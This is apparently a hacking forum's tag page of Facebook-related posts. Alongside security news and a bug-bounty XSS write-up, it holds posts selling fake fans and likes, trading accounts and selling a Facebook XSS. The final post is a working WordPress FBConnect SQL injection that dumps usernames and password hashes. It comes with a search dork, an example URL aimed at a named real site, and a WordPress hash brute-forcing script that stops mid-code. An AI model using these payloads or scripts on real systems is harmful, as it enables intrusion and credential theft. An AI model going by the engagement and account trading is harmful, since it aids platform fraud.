Showing results for tags 'facebook'.

  1. I'm selling real fans, 98% of them Romanian. 1000 - 9 euro; 2000 - 17 euro; 3000 - 25 euro; 4000 - 34 euro; 5000 - 42 euro. Prices are fixed, nothing is negotiable, I don't offer trial fans, and I don't send fans until I have received the money; in short, I get paid first and then I give you the fans. All the fans come from various movie, IT, music, etc. sites; they are Romanian and 100% real, not bots or anything like that. I can't state the delivery time for an order precisely because various factors are involved, such as other orders ahead of yours or technical problems. Naturally I want to send the fans as quickly as possible, which is what any customer wants, but that isn't always possible; the point is that the fans are delivered in the shortest time possible. I sell fans, not time!!! Payment methods: Paypal / bank transfer / Western Union.
  2. A new Facebook virus is spreading in Romania. It promises to show you who has viewed your profile. Many users in Romania complained about this scam over the weekend. A new scam that has appeared on Facebook urges Romanians to click a link to see who has viewed their profile. Unfortunately, all the curious users who did so ended up with an infected account. This threat spread widely in Romania over the weekend. IT security specialists say that such scams are old, yet the number of people who fall for them remains high. They also say that no Facebook application lets you see the people who view the information in your profile. Consequently, all posts that promise such a thing are fake. "No legitimate Facebook application allows users to see who views their profile. This scam leads to a fraud that, after numerous surveys, redirects users to fake prizes of latest-generation phones. Scams of this kind have been circulating on social networks for years, but they continue to claim victims among users, regardless of experience or age. They rely on social engineering mechanisms and on psychological stimuli that provoke people to click quickly, without thinking about the consequences. Who doesn't want a prize in exchange for a single like on Facebook? The scam steals the access tokens of a legitimate photo application, then posts on behalf of users, accessing their personal data. The dangerous application spreads easily among the victim's friends, who are automatically tagged when the message is posted. Bitdefender blocks the dangerous link, which it has marked as fraud," says Catalin Cosoi, Chief Security Strategist at Bitdefender Romania. Source: Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul - www.yoda.ro
  3. I recommend reading the news story below even though it's long. How do companies prepare for the worst? By exposing workers to lifelike crises. Early on Halloween morning, members of Facebook's Computer Emergency Response Team received an urgent e-mail from an FBI special agent who regularly briefs them on security matters. The e-mail contained a Facebook link to a PHP script that appeared to give anyone who knew its location unfettered access to the site's front-end system. It also referenced a suspicious IP address that suggested criminal hackers in Beijing were involved. "Sorry for the early e-mail but I am at the airport about to fly home," the e-mail started. It was 7:01am. "Based on what I know of the group it could be ugly. Not sure if you can see it anywhere or if it's even yours." Facebook employees immediately dug into the mysterious code. What they found only heightened suspicions that something was terribly wrong. Facebook procedures require all code posted to the site to be handled by two members of its development team, and yet this script somehow evaded those measures. At 10:45am, the incident received a classification known as "unbreak now," the Facebook equivalent of the US military's emergency DEFCON 1 rating. At 11:04am, after identifying the account used to publish the code, the team learned the engineer the account belonged to knew nothing about the script. One minute later, they issued a takedown to remove the code from their servers. With the initial threat contained, members of various Facebook security teams turned their attention to how it got there in the first place. 
A snippet of an online chat captures some of the confusion and panic:

Facebook Product Security: question now is where did this come from
Facebook Security Infrastructure Menlo Park: what's [IP ADDRESS REDACTED]
Facebook Security Infrastructure Menlo Park: registered to someone in beijing…
Facebook Security Infrastructure London: yeah this is complete sketchtown
Facebook Product Security: somethings fishy
Facebook Site Integrity: which means that whoever discovered this is looking at our code

If the attackers were able to post code on Facebook's site, it stood to reason, they probably still had that capability. Further, they may have left multiple backdoors on the network to ensure they would still have access even if any one of them was closed. More importantly, it wasn't clear how the attackers posted the code in the first place. During the next 24 hours, a couple dozen employees from eight internal Facebook teams scoured server logs, the engineers' laptop, and other crime-scene evidence until they had their answer: the engineer's fully patched laptop had been targeted by a zero-day exploit that allowed attackers to seize control of it.

This is only a test

The FBI e-mail, zero-day exploit, and backdoor code, it turns out, were part of an elaborate drill Facebook executives devised to test the company's defenses and incident responders. The goal: to create a realistic security disaster to see how well employees fared at unraveling and repelling it. While the attack was simulated, it contained as many real elements as possible. The engineer's computer was compromised using a real zero-day exploit targeting an undisclosed piece of software. (Facebook promptly reported it to the developer.) It allowed a "red team" composed of current and former Facebook employees to access the company's code production environment. (The affected software developer was notified before the drill was disclosed to the rest of the Facebook employees). 
The PHP code on the Facebook site contained a real backdoor. (It was neutralized by adding comment characters in front of the operative functions.) Facebook even recruited one of its former developers to work on the team to maximize what could be done with the access. The FBI e-mail came at the request of Facebook employees in an attempt to see how quickly and effectively various employee teams could work together to discover and solve the problems. "Internet security is so flawed," Facebook Chief Security Officer Joe Sullivan told Ars. "I hate to say it, but it seems everyone is in this constant losing battle if you read the headlines. We don't want to be part of those bad headlines." The most recent dire security-related headlines came last week, when The New York Times reported China-based hackers had been rooting through the publisher's corporate network for four months. They installed 45 separate pieces of custom-developed malware, almost all of which remained undetected. The massive hack, the NYT said, was pursued with the goal of identifying sources used to report a story series related to the family of China’s prime minister. Among other things, the attackers were able to retrieve password data for every single NYT employee and access the personal computers of 53 workers, some of which were directly inside the publisher's newsroom. As thorough and persistent as the NYT breach was, the style of attack is hardly new. In 2010, hackers penetrated the defenses of Google, Adobe Systems, and at least 32 other companies in the IT and pharmaceutical industries. Operation Aurora, as the hacking campaign came to be dubbed, exploited zero-day vulnerabilities in Microsoft's Internet Explorer browser and possibly other widely used programs. Once attackers gained a foothold on employee computers, they used that access to breach other, more sensitive, parts of the companies' networks. 
The hacks allowed the attackers to make off with valuable Google intellectual property and information about dissidents who used the company's services. It also helped coin the term "advanced persistent threat," or APT, used to describe hacks that will last weeks or months targeting a specific organization that possesses assets the attackers covet. Since then, reports of APTs have become a regular occurrence. In 2011, for instance, attackers breached the servers of RSA and stole information that could be used to compromise the security of two-factor authentication tokens sold by the division of EMC. A few months later, defense contractor Lockheed Martin said an attack on its network was aided by the theft of the confidential RSA data relating to its SecurID tokens, which some 40 million employees use to access sensitive corporate and government computer systems. "That was the inspiration around all this stuff," Facebook Security Director Ryan "Magoo" McGeehan said of the company's drills. "You don't want the first time you deal with that to be real. You want something that you've done before in your back pocket." Even after employees learned this particular hack was only for practice—about a half hour after the pseudo backdoor was closed—they still weren't told of the infection on the engineer's laptop or the zero-day vulnerability that was used to foist the malware. They spent the next 24 hours doing forensics on the computer and analyzing server logs to unravel that mystery. "Operation Loopback," as the drill was known internally, is notable for the pains it took to simulate a real breach on Facebook's network. "They're doing penetration testing as it's supposed to be done," said Rob Havelt, director of penetration testing at security firm Trustwave. "A real pen test is supposed to have an end goal and model a threat. It's kind of cool to hear organizations do this." 
He said the use of zero-day attacks is rare but by no means unheard of in "engagements," as specific drills are known in pen-testing parlance. He recalled an engagement from a few years ago of a "huge multinational company" that had its network and desktop computers fully patched and configured in a way that made them hard to penetrate. As his team probed the client's systems, members discovered 20 Internet-connected, high-definition surveillance cameras. Although the default administrator passwords had been changed, the Trustwave team soon discovered two undocumented backdoors built into the surveillance cameras' authentication system. Havelt's team exploited the backdoors to remotely take control of the cameras. With the ability to view their output, change their direction, and zoom in and out, the Trustwave employees trained them on computer keyboards as employees in the unidentified company entered passwords. With the help of the cameras' 10x zoom, the pen testers were able to grab a "ton" of credentials and use them to log in to the company's network. From there, the employees escalated privileges to gain administrative control of the network. (The employees later reported the vulnerability to the camera manufacturer, resulting in the eventual release of this security advisory.) We "ended up with domain admin on the internal network just because [the client] left these cameras on the Internet," Havelt said during a talk at last year's RSA conference. Havelt recalled a separate engagement in the last 12 months that involved a different client. After his team gained access to a system that was on the company's internal network, the hired hackers injected malicious code into webpages regularly accessed by the company's developers. The malicious Java applet exploited a recently discovered vulnerability in the Java software framework that Oracle had yet to patch. 
With full access to one of the developer's machines, the payload installed a new set of cryptographic keys that was authorized to access the company's servers using the SSH, or secure shell protocol. With that significant toehold established, the pen testers were able to escalate their control over the client's network. Adriel Desautels, CEO of pen testing firm Netragard, is also no stranger to the use of zero-day exploits, although he said he's often able to infect his clients using less sophisticated methods. During a recent engagement for a sensitive governmental agency located in the US, for instance, his team used social engineering to trick an agency employee into clicking on a link. The link, unbeknownst to the employee, installed "Radon," which is the name of pseudo-malware designed by Netragard to allow employees the same kind of sophisticated access many state-sponsored hackers behind espionage campaigns have. With the employee's desktop computer infected, Radon rummaged through the agency's network and added malicious commands to the "batch file" every computer ran when it logged in. The modified file caused each computer to also become infected with Radon. Seizing control of hundreds of independent machines gave the Netragard hackers a higher likelihood of maintaining persistence over the network, even in the event that the initial infection was discovered and cleaned up. "Eventually, it was game over," Desautels told Ars. "We had more control over their network than they did. That's how you do it. You don't just infect one system and stick it in their network and then try to infect the company. That doesn't guarantee you're going to be successful." Desautels praised the architects of Operation Loopback because Facebook "did more than most other companies in this industry will do." 
But he went on to say that the engagement was significantly more limited than most attacks waged by well-funded and experienced hackers who are intent on penetrating a Fortune 500 company. "If this were a real attack, they probably would have gone after multiple employees, especially with a zero day," he explained. "Why target one user when you have potentially hundreds of users you can target and get hundreds of points of entry?" Facebook, he continued, "probably got some good insight. But [the engagement] is not nearly as realistic as it would be if it was a nation-state attack just because [Operation Loopback] was very singular."

Stress testing Facebook's incident response

To be fair, the drill Facebook executives devised wasn't intended to replicate every characteristic of a real-world attack. Instead, the executives wanted to develop employees' ability to work together to respond to an attack that could have a catastrophic effect on the site's security. Sullivan, Facebook's CSO, calls it a "stress test" of his incident response team. "The team had grown substantially in the prior year, and we wanted to see if everyone is going to start screaming at each other or blaming each other because 'your logging system broke,' or 'your automated alerting should have triggered over here.' That was the human side of the test." Operation Loopback also wasn't the first drill to test employees' ability to respond effectively in times of crisis. Six months earlier, McGeehan, the company's security director, installed a host of powerful hacking tools on a laptop computer, connected it to the Facebook internal wireless network, and stashed it behind a supply cabinet in a public hallway. A few days later, employees with the company's physical security team reported the discovery of the mysterious laptop to the security team, touching off another tense response. 
Over the following day, employees scouring server logs found the computer's MAC, or media access control, address had accessed key parts of Facebook's network. "The first thing is: 'Oh my God. Panic,'" McGeehan said as he recalled his team's response to the incident. For almost 24 hours, the situation gave most employees every indication of being real. "As we're dealing with this, we realize that our network has been intruded on by some bad guy. Everyone in this room [is] thinking about 'how are we going to tear down our entire network? How are we going to basically deal with the worse-case scenario as a security incident?" To ratchet up the stress even further, the drill organizers sent an e-mail to members of Facebook's security team a few hours after the laptop was disconnected from the Facebook network. The e-mail purported to come from members of what's known as the Koobface Gang, whose members last year were identified as the perpetrators of virulent malware that spread over the social networking site. It made a series of demands of Facebook and promised serious reprisals if they weren't met. With Project Vampire, as the drill was dubbed, the employees worked a full 24 hours before they learned it wasn't a real hack. "We felt it was a necessary thing to have a great security team to put them through this kind of stuff," Sullivan explained. The organizers made an exception, however, when early in the drill, an employee said the magnitude of the intrusion he was investigating would require him to cancel a vacation that was scheduled to begin the following week. McGeehan pulled the employee aside and explained it was only a drill and then instructed him to keep that information private. Drills that use real zero-day vulnerabilities, require outside penetration testing firms, and suck up hundreds or thousands of man hours on non-production activities are expensive to carry out. 
But in a post-Operation Aurora world, where companies as security-savvy as Google and RSA are hacked and ransacked of valuable data, it is becoming increasingly necessary. "These things used to be unheard of when back when, except for governmental type organizations," Trustwave's Havelt said. "Now, you're seeing this more in the private sector. It's good to see. If it were any other industry and it was any other critical function of a product not doing this you'd have people screaming that [the companies] were negligent and wanting to sue them left and right." Source: At Facebook, zero-day exploits, backdoor code bring war games drill to life | Ars Technica Via: Digg - What the Internet is talking about right now
  4. The PokerAgent botnet was discovered in 2012 by ESET Security Research Lab. It is a Trojan horse designed to harvest Facebook log-on credentials, also collecting information on credit card details linked to the Facebook account and Zynga Poker player stats. According to the latest report, the botnet is still active, mostly in Israel, and 800 computers were infected, with over 16194 Facebook credentials stolen. The Trojan is active with many variants and belongs to the MSIL/Agent.NKY family. ESET reveals that the Trojan is coded in C# and is easy to decompile. After deep analysis, the team found that the bot connects to the C&C server. On command, the Trojan accesses the victim's Facebook account and collects the Zynga Poker stats and the number of payment methods (i.e. credit cards) saved in the Facebook account. Once collected, the information is sent back to the C&C server. The Trojan is downloaded onto the system by another downloader component. This downloader component was seen on the web and the victims have been fooled into downloading it. ESET tracking of the botnet revealed that at least 800 computers have been infected with the Trojan and that the attacker had at least 16194 unique entries in his database of stolen Facebook credentials by March 20, 2012. "We advise careful consideration before allowing a browser or other app to ‘remember’ passwords for sensitive services and before storing credit card details into any application (not only Facebook!)," ESET advises. Via PokerAgent botnet stole over 16,000 Facebook credentials - Hacking News
  5. Facebook today announced that it has opened registration for the Hacker Cup, its annual competition for programmers with a $10,000 top prize, up from $5,000 last year, for the best of them all. Facebook holds the Hacker Cup in rounds, starting first online and then culminating in a final onsite round at Facebook’s HQ in Menlo Park, CA for the top 25 programmers. This year's preliminary rounds will be held between January 25 and February 16. Facebook will fly the top 25 for the onsite final round that takes place March 22-23. The Hacker Cup is important for a couple of reasons. For one, it shows that, although Facebook is pushing past one billion members of its social network and is now one of the world’s biggest public tech companies, it is committed to trying to stay close to its Hacker Way roots. This is important for it to stay innovative, but it also helps keep Facebook in touch with the world community of top, smart programmers — an obvious route to tapping for top engineering talent. Facebook says that those who registered for a previous year are automatically registered for the competition year, although they still need to check their information is up-to-date. There is no limit to the number of people registering for the competition, as long as you sign up by the end of the first round, on the 27th of January. But there are a few limits on who can participate. Facebook notes in its rules and regulations that you need to be registered on Facebook yourself, you need to be 18 or older, and you cannot be resident in Quebec (!) or any other place where these kinds of competitions are prohibited by law. You also need to provide your real name, postal address, phone number, email address, and date of birth, which may weed out a few Anonymous types, as brilliant as some of them may be. The competition will follow the same form as in past years. Rather than free-form hackathon-style hacking, contestants are given problem sets that they need to solve. 
Answers come by way of source code and an output file to show how it works. They will be judged on how well they can come up with the solution in a set period of time, via a timer in the input set. They have six minutes to submit the source code and output file — and they can submit multiple answers in that time. Last year, the Hacker Cup attracted 8,000 hopefuls from 150 countries, but the final 25 came from a relatively narrow list of countries – Russia, Germany, Poland, Ukraine, China, South Korea, Japan, Taiwan, and the U.S., with the winner, Roman Andreev, hailing from Russia. You can read more about him and last year’s competition here. Just as it is telling that Facebook runs a Hacker Cup, it will be telling to see how many enter this year and how the country spread for finalists compares. Register FAQ Source
  6. This guy recently found a stored XSS on Facebook worth 3500 USD. This is his story of how he did it: I was actually working on finding flaws on Dropbox to begin with. I noticed that when using their web interface there were some restrictions on what filenames were allowed. If you tried to rename a file to for example: '"><img src=x onerror=alert(document.domain)>.txt it was not possible. You got this error: The following character are not allowed: \/:?*<>"| But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems. Using this method I was able to find two issues with their notification messages showing unescaped filenames. I reported these issues to Dropbox, they patched it really fast and I was placed on their Special Thanks page for the responsible disclosure. It didn’t end here. As I was testing out this stuff on Dropbox, I also tried to figure out how this issue could be connected with other services. I noticed their Facebook-connection and got curious on how it worked. It turned out that they had a pretty nice function going on there: “Dropbox has teamed up with Facebook so that you can do cool things like add files from Dropbox to your Facebook groups or send shared folder invitations to your Facebook friends.” Nice! I created a group, and found the connection using the “Add File” icon on the Group wall: I selected the file that I synced to Dropbox, it was called: '"><img src=x onerror=alert(document.domain)>.txt and shared it. Nothing awesome happened except the file being shared. But then, I clicked the Share-link on the entry. BAM! The title of the entry was not escaped correctly and I was able to get the Stored XSS triggered. By using the files in my Dropbox I could inject script code that was executed on Facebook.com. 
I reported this to Facebook directly using their Whitehat Vulnerability Reporting system, told them it was an urgent issue and how I managed to get it executed. The issue was at that time only affecting the Share-popup inside the Group page and could only be triggered by user interaction, serious or not, it was clearly not affecting all users on Facebook. At the same time I started looking on the URL of this Share-popup: https://www.facebook.com/ajax/sharer/?s=44&appid=210019893730&p%5B0%5D=entry_id&p%5B1%5D=user_that_shared_it_first This URL did not work if you tried it stand-alone. That was good, the XSS issue looked like it could only be triggered by user interaction. But then I started googling and found that you were able to create a Share-URL by using this format: https://www.facebook.com/sharer/sharer.php? So I changed my URL to that format: https://www.facebook.com/sharer/sharer.php?s=44&appid=210019893730&p%5B0%5D=entry_id&p%5B1%5D=user_that_shared_it_first BAM again! If you were logged in into Facebook, the code was executed as soon as you visited the link. Bad. Really bad. I emailed Facebook again, explaining that you could actually trigger the XSS by only visiting a link. I was also trying out if I could get other services to behave in the same way. Dropbox and Facebook had this special connection, so I was curious if this issue was isolated or if I could reproduce it by using another service. Went to Pinterest. Created a Pin named: '"><img src=x onerror=alert(document.domain)> and shared it on Facebook using my test account. I pressed the Share button on it. I was amazed – it had the same issue. Facebook replied to me, asking me how I was able to place the files on Dropbox with that filename. I explained how this was done and also told them that the service that you shared from didn’t matter, it was a general issue with the escaping that created a vulnerable vector on the Share-page. 
They responded and said that it was indeed the same issue and they should look into it ASAP. In the meantime, I tried the link on different devices. My iPhone could not get the XSS executed. As soon as I visited the page, I was redirected to https://m.facebook.com and that page did not have the same issue. But I also realized that you could force Facebook to skip the redirect by using a parameter called m2w, so if I appended that to the URL: https://www.facebook.com/sharer/sharer.php?s=44&appid=210019893730&p%5B0%5D=entry_id&p%5B1%5D=user_that_shared_it_first&m2w I was able to trigger the URL on both mobile devices and on desktop. Another email to Facebook. One day after that I noticed that the POC-link did not work anymore, it was finally patched. I told them I could not reproduce it anymore and it looked like it was fixed. One day later I got this email: Source: Detectify Blog – How I got a $3,500 USD Facebook Bug Bounty
  7. Traficanti.ro A site created for traffic devourers, webmasters who want more traffic, and those who want to make some extra money. With Traficanti.ro you can get the following: Facebook LIKEs, Twitter followers, views for YouTube videos, Google +1s, visits to your personal site, and pocket money. Traficanti.ro pays you to visit sites: you get $0.01 for each site you visit in auto-surf, and on registration you get a BONUS of $0.20, plus 50 coins to promote your own site. (1) What is this site? This site is an exchange system that helps you increase your site's traffic and popularity. (2) What are coins? Coins are points you receive for any activity on this site. (3) What can I do with coins? Coins can be converted into ratings on Google+, fans on Facebook, followers on Twitter, views on YouTube, or visits to your site. (4) How do I earn coins? Coins are earned for each rating, like, follow, or view of an address from another user. (5) How can I earn money? You can earn money through auto-surf or by bringing people to the site through your personal link. Use this coupon for a BONUS of 100 coins: rst-center-forum (valid for the first 100 people)
  8. The coolest likes site; it's a kind of like exchange: you go in, create an account, add your Facebook page (the one you want to receive clicks on), choose an amount you offer for a like, and then you start giving likes yourself; for each like you give you receive a certain number of points, which go into your account. For example, if you asked 10 Coins for your like and you have earned 50 Coins, then you will receive 5 likes; here it depends on how hard-working you are, you can even do 1000 a day, or you can use an autoclicker. http://addmefast.com/?ref=PMZ7B http://addmefast.com/ Of course, for this much effort it wouldn't hurt if you signed up through the referral link.
  9. 500 - 5 USD; 1000 - 10 USD; 2000 - 20 USD. 100% REAL USERS. Offers here or by PM. Payment: Paypal
  10. I urgently need someone to build me 2 Facebook applications like: facebook.com/Like2Watch "which engine suits you", "you will see ghosts"; I'm waiting for PMs with offers.
  11. Several photographs, which only Mark Zuckerberg's closest friends had access to, could be accessed and seen by everyone after a hacker managed to break into the Facebook chief's account. Representatives of the social network say the hacker took advantage of a flaw in the system, which has since been fixed. The photographs made public on the internet show part of Mark's private life, alongside his girlfriend, Priscilla Chan. The two cook together, go to restaurants, or stay at home with close friends. Moreover, photographs have also appeared from Mark's most important meetings, among them the one with American President Barack Obama. Source: http://www.antena3.ro/externe/cat-de-sigur-este-facebook-contul-lui-mark-zuckerberg-a-fost-spart-de-hackeri-vezi-poze-private-cu-el-si-iubita-146812.html
  12. As the title says, I'm trading a Steam account with Counter-Strike 1.6 for 5 Facebook accounts that each have over 2000 friends. Anyone interested should send me a PM or leave a reply. I ask those who have nothing to do with the topic to refrain from pointless comments.
  13. I urgently need a lot of likes for a Facebook page; PM with offers. I'm urgently buying Facebook accounts with many friends; PM with offers.
  14. eth0

    [Selling] XSS Fb

    XSS in facebook.com Price $100 (350 lei) WU, PP Proof to moderators or after I see the money. PM. And 1K+ .FR DBs
  15. Social networking phenomenon Google+ (or Google Plus), whose early growth has been meteoric, has finally hit turbulence - Web analytic firm Experian Hitwise said the site witnessed a drop in traffic growth and average usage time - but it still poses a threat to Facebook. Google+ launched on June 28 and, despite being in the beta phase, grew at a blistering pace and hit the 20 million member mark in its first three weeks, according to data released last week by comScore. Earlier this week, Hitwise reported that visits to Google+ had soared 283 percent for the week ending July 16 compared to the week before and 821 percent for the week ending July 9 compared to the week before that. Google+, it seemed, had only one aim - to be the best social networking site and it was well headed in that direction. No wonder, Google CEO Larry Page was boastful: "We want to make products that everybody uses twice a day, like their toothbrush." And indeed, everybody from private individuals to the largest of the business corporations wanted a piece of action on Google+. However, what happened next was unexpected. Google+ began to boot businesses from the site and urged users to use their real name for Google+ accounts or risk being deleted. Not surprisingly, it resulted in a rush of complaints - while some businesses felt Google+ is ignoring the needs of the corporate, others felt Google+ was indulging in favoritism it said it will select a limited number of business partners for a test period following which it will "have an initial version of businesses profiles up and running for EVERYONE." However, businesses were not the only ones to complain of Google's policy. When Google said Google+ users must furnish their real names or risk account deletion, some users said they used their real name and had their account deleted anyway, while others said they should be able to use a pseudonym to protect their privacy. 
The controversies as well as the fact that users aren't too happy with Google+'s aura of exclusivity (currently people are allowed to use the site on 'invite-only' basis) as a critical mass of their friends and contacts aren't on it yet, not surprisingly tarnished Google+'s halo and users' ire/frustration translated in a drop of traffic and usage activity last week. For the week ended July 23, Google+ received only 1.79 million visits (down 3 percent compared to previous week) and the average time spent on the site was also down 10 percent, compared to previous week, to 5 minutes and 15 seconds. Though Hitwise didn't offer any explanation for the drop in numbers, it suggested that Google+, which witnessed a dream start, has finally crash-landed. And, to make matters worse, Facebook quietly attempted to poach on businesses that are dissatisfied with Google+'s decision, by releasing Facebook for Business that teaches companies how to grow their businesses using Facebook's "powerful marketing tools" including Facebook Pages and Facebook Ads. "Business owners can learn best practices for creating a Page and engaging customers in a two-way conversation to answer questions, get valuable feedback, and to reach their friends," a Facebook spokesperson wrote. However, by no means, the traffic slump indicates the end of Google+. Though currently a fledgling social network compared to Facebook, Google+ is perhaps the biggest threat Facebook has ever faced and there are seven reasons why: Best Facebook Rival: According to Search Engine Land's founder Sullivan, Google is "the only company well positioned to launch a Facebook alternative." "People like alternatives. Twitter doesn't offer a full-fledged alternative to the Facebook experience. Google does," he said. Indeed, Google+ offers one of the best social networking experience. Google+ offers one-stop-shop social networking experience for people who want to link up with friends and family, but don't like using multiple sites. 
According to technology analyst Rob Enderle, "Google+ has aspects of Twitter, Facebook and LinkedIn in it, and folks are a bit overwhelmed with all of the different social networking services." "Folks have also crammed these other services with tons of 'friends' they don't really know, and the sheer volume of activity has weakened the quality of the experience," Enderle told ABC News in an email. That's true. Facebook is for family and friends, LinkedIn is for professionals and Twitter is for micro-blogging. The experience could turn out to be quite overwhelming but Google+ could be the perfect solution for it offers various ways to connect to your friends, family and more - through video, SMS, etc - while at the same time boasting of privacy and content-sharing features that are better and easier to use than Facebook's. Circles: Google+ Circles offers a simple means of organizing one's social network by grouping contacts into anything you can possibly imagine - family, friends, co-workers, etc and sharing content with the customized groups. Thanks to Circles, users can group their contacts under specific names such as Family, Friends, Acquaintances, Co-workers, in fact, anything at all. In other words, Circles will allow Google+ users to focus on the things a subset of the profile's contacts are interested in and will help it to separate the signal from the noise. Circles, in fact, could be Google+'s biggest strength as neither Facebook nor Twitter allows you to group your contacts and both force users to share anything and everything they post with all their friends, with few options to control. On the other hand, Google+ allows users to share information with only those contacts or group of contacts they want to share with. Privacy Approach: Privacy issues have been Facebook and Twitter's bugbear for long. 
Anything posted up on Facebook or Twitter is displayed for the world to see, be it your family, your boss or even complete strangers, even as horror stories of contents not meant to be seen by family members, friends or co-workers continue to grow. However, Facebook has done little to address the issue and has adopted a cavalier attitude towards this. On the other hand, Google has attempted to circumvent this problem by introducing "data liberation" tool in Google+ which allows you to pack up and take your data away from Google+ should you decide to leave the service. If you want to leave Facebook, it's a Herculean task to export your data elsewhere. All you can do is delete your profile. Hangouts: Perhaps the greatest strength of Google+, the multiuser video conferencing tool allows up to 10 users to see and talk to one another at the same time. The one with the loudest voice gets the centerstage. Hangouts can be the future of webinars and it has already sparked users' imaginations about potential business use cases. Despite Facebook announcing the integration of Skype videoconferencing, nothing will be able to beat Hangouts, at least for now. Integration: A major strength of Google+ and its advantage over Facebook is integration. Almost all the existing Google online services, from Search and Documents to Email (Gmail) and Video, will be built into Google+ social networking features. It will allow the user to monitor all Google+ events in such a way so that the user never misses out on anything, anywhere, anytime. Search: Google's most powerful weapon is its unrivaled search engine, imitated by many but mastered by none. If Google integrates its own Google+ live feed Sparks with the Search service, it will blow away Facebook because though Facebook has had a huge headstart as a social network site BUT it has little or no penetration into the search market. 
With Facebook, a user must leave the site to find stuff to share or wait until their friends share it with them. On the other hand, with Sparks, you can get an instant fountain of relevant information to share with friends. Blistering Pace of Growth: If we take the latest figures from Hitwise to be an aberration, we cannot help but say that compared to Facebook, Google+ has been growing at a blistering pace. Facebook, which opened to the public in September 2006, had only 30 million subscribers by March 2007. The site, however, now has 750 million users. Moreover, within a short span of time Google+ has become the 42nd most-visited social networking site and the 638th most-visited site overall in the U.S, according to Hitwise. In fact, though traffic may have slowed down at Google+, Hitwise's Matt Tatham was careful not to overplay the findings and acknowledged, "this is not a huge drop." There could be three reasons why. Firstly, let's not forget that Google's decision to purge business accounts and fake names could have contributed to the losses. If Google addresses the issues, the problem will be solved. Secondly, Hitwise figures don't take into account visits through mobile apps or APIs i.e. any use of the Google+ app for iPhone or Android isn't being counted. And, given that the Google+ iPhone app launched last week and quickly rose to the top of the App Store rankings, there's a good chance that mobile users have easily made up for the losses that Hitwise is reporting. Thirdly, the figures are just for the USA and do not include countries like India where Google+ has seen an uptick. In conclusion, it's too early to write off Google+. In fact, only an idiot will write off Google+ because the site is still in its beta phase and hasn't yet opened up to the public. Moreover, if Google+ had the trappings of its doomed predecessors like Google Wave and Google Buzz, the market cap of Google Inc. wouldn't have jumped by $45 billion since the launch of the site. 
And, given Google's powerful ecosystem of products and services and plenty of hype, Google+ will have no problem in attracting new registered users and converting them into returning visitors. The world needs a new social networking site, if the 20 million people who have joined Google+ is any indication, and "For people who love Google," said Sullivan, "it's like they've found a home where they can be loud and proud about the company." There is a very good chance Google+ will not only continue to survive but also it will thrive and unless Google truly messes it up in the next two years, it will become an unstoppable force and can be a threat to Facebook. Otherwise why would Facebook go on an overdrive to delete Google+ ads on its site or try to keep Facebook users from exporting Facebook contacts into Google+? Source: Google+ Witnesses Traffic Slump but Still a Threat to Facebook: Seven Reasons Why.
  16. Wordpress Sql Injection

    App : FBConnect WordPress Plugin
    Type : Sql-Injection
    Dork : inurl:"fbconnect_action=myhome"
    Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
    PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
    Example: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--

    ok when you have the hash, md5 and encode64() you can test a bruteforce with this (python):

        # code by : tdxev
        # website : www.tdxev.com
        # team : www.insecurity.ro
        # version : 2011.01.17
        # documentation : /wp-includes/class-phpass.php
        import md5
        import time

        # user settings
        wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashes
        #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev
        charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use
        dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash
        progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made

        # app settings
        itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

        # used by crypt_private
        def encode64 (textInput,count):
            output = ''
            i = 0
            while i < count :
                i = i + 1
                value = ord(textInput[i-1])
                output = output + itoa64[value & 63]
                if i < count :
                    value = value | ord(textInput[i]) << 8
                output = output + itoa64[(value >> 6) & 63]
                i = i + 1
                if i >= count:
                    break
                if i < count:
                    value = value | ord(textInput[i]) <<16
                output = output + itoa64[(value >> 12) & 63]
                i = i + 1
                if i >= count:
                    break
                output = output + itoa64[(value >> 18) & 63]
            return output

        # generate wordpress hash
        def crypt_private (plainText, wordpressHash):
            output = '*0' # old type | not supported yet
            if wordpressHash[0:2] == output:
                output = '*1'
            if wordpressHash[0:3] != '$P$': # old type | not supported yet
                return output
            count_log2 = itoa64.find(wordpressHash[3]) # get how many times the hash will be generated
            if (count_log2 < 7) or (count_log2>30):
                return output
            count = 1 << count_log2 # get how many times the hash will be generated
            salt = wordpressHash[4:12] # get salt from the wordpress hash
            if len(salt) != 8 :
                return output
            plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try
            for i in range (count):
                plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate the hash
            output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt)
            output = output + encode64(plainTextHash,16) # create the new hash
            return output

        # class that generates the words
        class wordGenerator ():
            def __init__(self, word, charSet):
                self.setCurretWord(word) # word to start
                self.setCharSet(charSet) # character set used to generate the words

            # set current word
            def setCurretWord (self, word):
                self.currentWord = word

            # set the character set that will be used
            def setCharSet (self, charSet):
                self.charSet = charSet

            # generate the next word, set that word as currentWord and return the word
            def nextWord (self):
                self.setCurretWord( self._incWord(self.currentWord) )
                return self.currentWord

            # generate the next word
            def _incWord(self, word):
                word = str(word) # convert to string
                if word == '': # if word is empty
                    return self.charSet[0] # return first char from the char set
                wordLastChar = word[len(word)-1] # get the last char
                wordLeftSide = word[0:len(word)-1] # get word without the last char
                lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set
                if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set
                    wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set
                else: # it is the last char
